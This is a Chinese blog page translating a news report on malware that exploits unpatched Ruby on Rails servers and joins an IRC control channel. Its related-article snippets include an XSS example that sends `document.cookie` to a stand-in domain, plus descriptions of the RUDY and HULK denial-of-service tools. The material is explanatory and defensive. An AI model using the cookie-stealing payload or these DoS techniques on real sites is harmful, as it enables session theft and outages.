Ruby on Rails 攻击威胁服务器

最新推荐文章于 2021-12-22 19:30:00 发布
最新推荐文章于 2021-12-22 19:30:00 发布
阅读量854 收藏
点赞数
文章标签: Ruby on Rails 服务器 漏洞 软件 Linux

Ruby on Rails 攻击威胁服务器

 

管理者们被激发去升级他们的Ruby on Rails,因为发现了一个活跃的恶意软件,目标是有漏洞缺陷的Web开发框架。

 

研究者Jeff Jarmoc表示攻击行为是在这周早些时候被发现的,现在认为部分禁用、掠夺Ruby on Rails有缺陷版本的漏洞,利用恶意软件来影响目标系统,试图建立IRC连接一个可能被指挥和控制的系统。

 

这种攻击会影响服务器,或者侵入更大的网络构成网络犯罪。

 

Jarmoc解释道:“功能性是有限的,但是包括可以下载可执行文件例如指令文件,就可以改变服务器。现在无发证明该性能,所以一个较强的个体加入到IRC服务并且出发适当的指令就可以相当容易的攻击这些bots。”

 

但是对于这些攻击所造成的危险,管理员是可以保护自己的,通过升级最新的Ruby on Rails。修复漏洞的补丁在今年年初的时候就可以下载了,并且Ruby on Rails服务运行是3.0.20 2.3.16或更高的版本的话就会就受到攻击保护。

 

这个非常流行的web开发平台,Ruby on Rails并不会想那些主流平台像是Java那样的受到普遍的攻击。因为高风险是由成功的攻击所造成的,然而这个平台将会受到更多网络犯罪的关注。

 

高级安全顾问Chester Wisniewski表示高性能Linux服务器就足以吸引攻击者,甚至并不是那种大规模部署的系统。

 

广泛部署的软件系统像是Ruby on Rails随时都有漏洞,他需要几年时间让全世界的管理员抽出时间来升级补丁。

 

事实上,比Linux操作系统更遭的是那些被认为更安全不需要定期发布补丁的软件,像是Windows, Java, Flash和其他广泛应用的软件。

 

原文地址:http://www.v3.co.uk/v3-uk/news/2271353/ruby-on-rails-attacks-threaten-servers

yzhangaa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
什么是 RUDY 攻击
ZY_Eliza的博客
12-30 436
攻击于 7 月 2 日首次被发现,并已蔓延至美国、澳大利亚、欧盟、拉丁美洲和亚洲的 30 多个 MSP 和 1,500 多家企业。 客户收到了恶意的“VSA 代理修补程序”包,该包能够通过利用 Microsoft Defender 应用程序的旧有缺陷版本来克服防病毒保护。 根据官方 REvil 博客上的更新,Kaseya 供应链攻击导致超过 100 万个单独的设备被加密并停止运行。 安全公司 SOPHOS 对勒索软件进行了详细的取证分析。本文档中的攻击叙述是根据该信息和 Internet 上...
RUDY 攻击如何运作?
zy18165754120的博客
12-22 292
RUDY 攻击可以分解为以下步骤: RUDY 工具抓取受害者的应用程序以寻找表单字段。 找到表单后,该工具会创建一个HTTPPOST 请求来模拟合法的表单提交。这个 POST 请求包含一个标头*,它提醒服务器将要提交一段很长的内容。 然后,该工具通过将表单数据分解成每个小至 1 个字节的数据包,以每个大约 10 秒的随机间隔将这些数据包发送到服务器,从而拖延提交表单数据的过程。 该工具会无限期地继续提交数据。Web 服务器将保持连接打开以接受数据包,因为攻击行为类似于用户提交表单数据的连接速度较慢.
攻击工具
Cybenko
07-03 942
一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会被渲染成以下形式: <p><script>location.href=
DDOS hulk,rudy
weixin_30588827的博客
02-28 865
HULK (HTTP Unbearable Load King) HULK HULK是另一个DOS攻击工具,这个工具使用UserAgent的伪造,来避免攻击检测,可以通过启动500线程对目标发起高频率HTTP GET FLOOD请求,牛逼的是每一次请求都是独立的,可以绕过服务端的缓存措施,让所有请求得到处理。HULK是用Python语言编写,对获得源码进...
基于 Ruby on Rails 的个人博客网站
最新发布
06-09
**Ruby on Rails(RoR)** 是一个使用 **Ruby** 编程语言开发的开源Web应用程序框架,它遵循MVC(Model-View-Controller)架构模式。这个框架以生产力和简洁性著称,使得开发者能够快速构建功能丰富的动态网站。 在...
ruby on rails操作流程.pdf
10-29
Ruby on Rails 操作流程详解》 Ruby on Rails(简称Rails)是一款基于Ruby语言的开源Web应用程序框架,它遵循MVC(模型-视图-控制器)架构模式,旨在提高开发效率和代码可读性。在本文中,我们将深入探讨在Ubuntu...
基于Ruby on Rails实现的在线考试系统
03-21
服务器上部署后可以由老师管理其考试,并发布给学生参加考试。由于需要自动化评分,题型只支持选择题和多选题 ## 管理员账户生成 可以使用`rake db:seed`来生成管理员账户,不过在数据库内teachers表内已经有...
Ruby on Rails基础之新建项目
09-21
完成依赖安装后,启动Rails服务器: ```bash rails server ``` 现在,你可以访问`http://localhost:3000`查看新创建的Rails应用。这只是开始,Rails提供了丰富的功能,如路由配置、模型生成、控制器创建、数据库...
如何阻止 RUDY 攻击
zy18165754120的博客
12-22 572
由于慢速和低强度攻击比传统的拒绝服务攻击要巧妙得多,因此很难被检测到,但可以采取保护措施来防止它们。其中一种预防措施是在 Web 服务器上设置更严格的连接超时间隔,这意味着最慢的连接将被切断。此解决方案有一个副作用:Internet 连接速度较慢的合法用户可能会被服务器拒绝提供服务。或者,反向代理解决方案,例如Cloudflare 的 DDoS 保护,可以过滤掉像 RUDY 攻击这样的低速和慢速攻击流量,而不会断开合法用户的连接。 ...
Rails开发细节《八》Rails应用的安全
weixin_34199335的博客
11-26 128
看过本文之后,你应该熟悉下面的内容: 所有显著的对策。 rails中session的概念,其中存放的内容,常见的攻击手段。 rails中大量的分配问题。 在提供管理接口的时候,你不得不关注的一些事情。 如何管理用户:登陆,退出,在各个层面的攻击方法。 常见的注入攻击方法。 1.简介 web框架帮助开发者构建web应用。它们中的一些还可以帮助你构建安全...
rudy 方法 分析
05-01 370
什麼叫做一個方法呢?在OO編程里,我們不希望直接從外部操縱一個對象的數據;相反的,對象自己了解如何操縱自身(當被恰當地要求時).  你也許會說我們傳遞一條消息給一個對象,那些消息就會調用某類行為或者做有意義的回復.這些都會在我們無需了解或關心這個對象內部  工作機制的情況下發生.為我們所允許的可讓其執行的作業(或等價的,它能聽懂的消息)就是對象的方法.  在ruby里,我們通過點(dot
(九)拒绝服务攻击工具
weixin_41082546的博客
03-14 808
拒绝服务分类 攻击带宽 攻击并发 消耗cpu内存 攻击代码漏洞 1. rudy(r-y dead yet) 1. 简介 慢速应用层HTTP POST攻击,与slowhttptest原理相同 每次只传输一个字节的数据 美剧黑客军团”中曾提到此攻击手段 攻击有表单WEB页面,攻击时需指定攻击的参数名称 https://sourceforge.net/projects/r-u-dead-yet/...
DNS服务器漏洞
itclock的专栏
07-28 1331
Infoworld 报道,著名黑客HD Moore已经率先公布了可用代码.利用这段代码可以对DNS服务器进行投毒,将一条恶意纪录植入目标服务器,该服务器将随机发起域名查询,此时攻击者可以提供伪造的响应,将域名服务器中的纪录指向其特定站点.这个漏洞攻击可以默默的改变用户的升级服务下载恶意软件,IOActive研究者Dan Kaminsky很早发现漏洞并且无意中这周公布了漏洞使得开发出攻击代码.i
rails优化五:不可忽视的安全问题
Whao.Mobile的专栏
01-26 339
rails的安全问题检测。
Kali Linux渗透测试 133 拒绝服务攻击工具
kevinhanser
04-11 6443
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. rudy1. 简介 慢速应用层HTTP POST攻击,与slowhttptest原理相同 每次只传输一个字节的数据 美剧黑客军团”中曾提到此攻击手段 攻击有表单WEB页面,攻击时需指定攻击的参数名称 h
【附对比清单,赶紧收藏】我是怎么选择DDoS解决方案的?
cloudguarder的博客
08-18 1799
现在攻击越来越频繁,大家都知道要为DDoS攻击提前做好准备。但问题是没人告诉你该怎么做好准备!新的威胁不断出现,难道仅仅是给每天的生活加点料?市场鱼龙混杂,所有的厂商都在做完美的市场营销,专家层出不穷,或许只能依赖自己的火眼金睛来选择最适合自己的解决方案。那么在选择DDoS厂商时,该考虑什么呢? 在这里云端卫士列了一个对比清单,来帮助大家更好地完成DDoS厂商选择流程。 1、理
剖析 rudy 訪問控制
05-01 176
前面,我們說Ruby沒有函數,只有方法.而且實際上有不止一種方法.這一節我們介紹訪問控制(access controls). 想想當我們在"最高層"而不是在一個類的定義里定義一個方法時會發生什麼.我們可以把這樣的方法設想為在像C那樣的傳統語言中的函數的類似物. ruby> def square(n) | n * n | end nil ruby> square(5)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值